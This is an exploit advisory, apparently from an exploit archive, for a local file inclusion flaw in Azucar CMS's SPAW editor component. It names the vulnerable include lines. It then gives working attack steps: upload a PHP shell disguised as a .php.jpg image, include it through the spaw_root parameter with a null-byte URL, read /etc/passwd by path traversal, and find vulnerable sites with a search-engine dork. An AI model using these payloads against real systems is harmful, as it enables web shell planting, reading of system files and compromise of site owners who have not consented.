#
#           zogs
# http://www.autistici.org/c0de
#      zogs@anche.no

# cms: http://azucarcms.sourceforge.net/
# bug: LFI

# bug
include $spaw_root.'config/spaw_control.config.php'; in cms_estable/lib/spaw/spaw_control.class.php
include $spaw_root.'class/util.class.php'; in cms_estable/lib/spaw/spaw_control.class.php
include $spaw_root.'class/toolbars.class.php'; in cms_estable/lib/spaw/spaw_control.class.php
include $spaw_root.'class/lang.class.php'; in cms_estable/lib/spaw/spaw_control.class.php

# start
rename your PHPshell.txt in PHPshell.php.jpg
for default you have access in img_library.php for upload PHPshell.php.jpg:

http://www.victim.com/lib/spaw/dialogs/img_library.php

call  PHPshell.php.jpg:
http://www.victim.com/lib/spaw/spaw_control.class.php?spaw_root=../../imagenes_cont/articulos/PHPshell.php.jpg%00

# tricks: http://www.victim.com/lib/spaw/spaw_control.class.php?spaw_root=../../../../../etc/passwd%00

# dork: allinurl:html/sitio/